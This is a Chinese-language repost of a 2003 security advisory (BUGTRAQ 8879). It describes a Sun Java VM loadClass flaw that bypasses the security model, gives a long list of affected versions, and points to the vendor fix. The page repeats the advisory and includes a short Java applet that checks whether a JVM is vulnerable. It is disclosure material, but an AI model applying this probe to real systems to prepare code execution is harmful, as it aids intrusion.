- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
Sun Java虚拟机路径处理绕过安全模型漏洞
作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0 |
黑客防线网安网讯:发布时间:2003-10-22更新时间:2003-11-06严重程度:高威胁程度:普通用户访问权限错误类型:设计错误利用方式:服务器模式BUGTRAQ ID:8879受影响系统
HP HP-UX 11.0 H ...
HP HP-UX 11.0 H ...
发布时间:2003-10-22
更新时间:2003-11-06
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8879
受影响系统
Sun Java虚拟机在loadClass方法的实现上存在逻辑缺陷,攻击者可以利用此漏洞绕过Java的安全控制,在主机上执行任意代码。
测试代码
Alla Bezroutchko <alla@scanit.be>
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
解决方案
厂商已经在新版软件中修补了此漏洞:
http://java.sun.com/j2se/
相关信息
[LSD] Security vulnerability in SUN's Java Virtual Machine implementation
http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html
Sun Alert ID: 57221
cgi/retrieve.pl?doc=fsalert%2F57221">http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221
更新时间:2003-11-06
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8879
受影响系统
HP HP-UX 11.0详细描述
HP HP-UX 11.11
HP HP-UX 11.22
HP HP-UX 11.23
Sun JRE (Linux Production Release) 1.2.2 _015
Sun JRE (Linux Production Release) 1.2.2 _014
Sun JRE (Linux Production Release) 1.2.2 _013
Sun JRE (Linux Production Release) 1.2.2 _011
Sun JRE (Linux Production Release) 1.2.2 _010
Sun JRE (Linux Production Release) 1.2.2 _007
Sun JRE (Linux Production Release) 1.2.2 _006
Sun JRE (Linux Production Release) 1.2.2 _005
-Debian Linux 2.2
-MandrakeSoft Linux Mandrake 7.2
-RedHat Linux 7.0
-S.u.S.E. Linux 7.0
Sun JRE (Linux Production Release) 1.2.2 _004
Sun JRE (Linux Production Release) 1.2.2 _003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Linux Production Release) 1.3.1 _07
Sun JRE (Linux Production Release) 1.3.1 _06
Sun JRE (Linux Production Release) 1.3.1 _05
Sun JRE (Linux Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1 _02
Sun JRE (Linux Production Release) 1.3.1 _01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.4.1 _03
Sun JRE (Linux Production Release) 1.4.1 _02
Sun JRE (Linux Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Reference Release) 1.2.2 _011
Sun JRE (Reference Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2 _014
Sun JRE (Solaris Production Release) 1.2.2 _013
Sun JRE (Solaris Production Release) 1.2.2 _012
Sun JRE (Solaris Production Release) 1.2.2 _011
Sun JRE (Solaris Production Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.3.1 _07
Sun JRE (Solaris Production Release) 1.3.1 _06
Sun JRE (Solaris Production Release) 1.3.1 _05
Sun JRE (Solaris Production Release) 1.3.1 _04
Sun JRE (Solaris Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1 _02
Sun JRE (Solaris Production Release) 1.3.1 _01
Sun JRE (Solaris Production Release) 1.4.1 _03
Sun JRE (Solaris Production Release) 1.4.1 _02
Sun JRE (Solaris Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.2.2 _015
Sun JRE (Windows Production Release) 1.2.2 _014
Sun JRE (Windows Production Release) 1.2.2 _013
Sun JRE (Windows Production Release) 1.2.2 _011
Sun JRE (Windows Production Release) 1.2.2 _010
Sun JRE (Windows Production Release) 1.2.2
Sun JRE (Windows Production Release) 1.3.1 _07
Sun JRE (Windows Production Release) 1.3.1 _06
Sun JRE (Windows Production Release) 1.3.1 _05
Sun JRE (Windows Production Release) 1.3.1 _04
Sun JRE (Windows Production Release) 1.3.1 _03
+Macromedia ColdFusion Server MX Developer
+Macromedia ColdFusion Server MX Enterprise
+Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1 _02
Sun JRE (Windows Production Release) 1.3.1 _01a
Sun JRE (Windows Production Release) 1.3.1 _01
Sun JRE (Windows Production Release) 1.4.1 _03
Sun JRE (Windows Production Release) 1.4.1 _02
Sun JRE (Windows Production Release) 1.4.1 _01
+Opera Software Opera Web Browser 7.11
+Opera Software Opera Web Browser 7.11 j
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.2 _01
Sun SDK (Linux Production Release) 1.2.2 _13
Sun SDK (Linux Production Release) 1.2.2 _12
Sun SDK (Linux Production Release) 1.2.2 _015
Sun SDK (Linux Production Release) 1.2.2 _014
Sun SDK (Linux Production Release) 1.2.2 _011
Sun SDK (Linux Production Release) 1.2.2 _010
Sun SDK (Linux Production Release) 1.3.1 _07
Sun SDK (Linux Production Release) 1.3.1 _06
Sun SDK (Linux Production Release) 1.3.1 _05
Sun SDK (Linux Production Release) 1.3.1 _03
Sun SDK (Linux Production Release) 1.3.1 _02
Sun SDK (Linux Production Release) 1.3.1 _01
Sun SDK (Linux Production Release) 1.4.1 _03
Sun SDK (Linux Production Release) 1.4.1 _02
Sun SDK (Linux Production Release) 1.4.1 _01
Sun SDK (Linux Production Release) 1.4.1
Sun SDK (Solaris Production Release) 1.2.2 _14
Sun SDK (Solaris Production Release) 1.2.2 _13
Sun SDK (Solaris Production Release) 1.2.2 _12
Sun SDK (Solaris Production Release) 1.2.2 _11
Sun SDK (Solaris Production Release) 1.2.2 _10
Sun SDK (Solaris Production Release) 1.2.2 _07a
Sun SDK (Solaris Production Release) 1.2.2
Sun SDK (Solaris Production Release) 1.3.1 _07
Sun SDK (Solaris Production Release) 1.3.1 _06
Sun SDK (Solaris Production Release) 1.3.1 _05
Sun SDK (Solaris Production Release) 1.3.1 _03
Sun SDK (Solaris Production Release) 1.3.1 _02
Sun SDK (Solaris Production Release) 1.3.1 _01
Sun SDK (Solaris Production Release) 1.4.1 _03
Sun SDK (Solaris Production Release) 1.4.1 _02
Sun SDK (Solaris Production Release) 1.4.1 _01
Sun SDK (Solaris Production Release) 1.4.1
Sun SDK (Solaris Reference Release) 1.2.2 _015
Sun SDK (Solaris Reference Release) 1.2.2 _014
Sun SDK (Solaris Reference Release) 1.2.2 _013
Sun SDK (Solaris Reference Release) 1.2.2 _012
Sun SDK (Solaris Reference Release) 1.2.2 _011
Sun SDK (Solaris Reference Release) 1.2.2 _010
Sun SDK (Windows Production Release) 1.2.2 _015
Sun SDK (Windows Production Release) 1.2.2 _014
Sun SDK (Windows Production Release) 1.2.2 _013
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _012
Sun SDK (Windows Production Release) 1.2.2 _011
Sun SDK (Windows Production Release) 1.2.2 _010
Sun SDK (Windows Production Release) 1.3.1 _07
Sun SDK (Windows Production Release) 1.3.1 _06
Sun SDK (Windows Production Release) 1.3.1 _05
Sun SDK (Windows Production Release) 1.3.1 _04
Sun SDK (Windows Production Release) 1.3.1 _03
Sun SDK (Windows Production Release) 1.3.1 _02
Sun SDK (Windows Production Release) 1.3.1 _01a
Sun SDK (Windows Production Release) 1.4.1 _03
Sun SDK (Windows Production Release) 1.4.1 _02
Sun SDK (Windows Production Release) 1.4.1 _01
Sun SDK (Windows Production Release) 1.4.1
Sun Java虚拟机在loadClass方法的实现上存在逻辑缺陷,攻击者可以利用此漏洞绕过Java的安全控制,在主机上执行任意代码。
测试代码
Alla Bezroutchko <alla@scanit.be>
import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;
public class Simple extends Applet {
StringBuffer buffer;
public void init() {
buffer = new StringBuffer();
}
public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}
}
void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}
public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);
//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}
解决方案
厂商已经在新版软件中修补了此漏洞:
http://java.sun.com/j2se/
相关信息
[LSD] Security vulnerability in SUN's Java Virtual Machine implementation
http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html
Sun Alert ID: 57221
cgi/retrieve.pl?doc=fsalert%2F57221">http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221
黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show.php?contentid-3055.html
新闻栏目
| 我要申请本站:N点 | 黑客防线官网 | |
| 专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |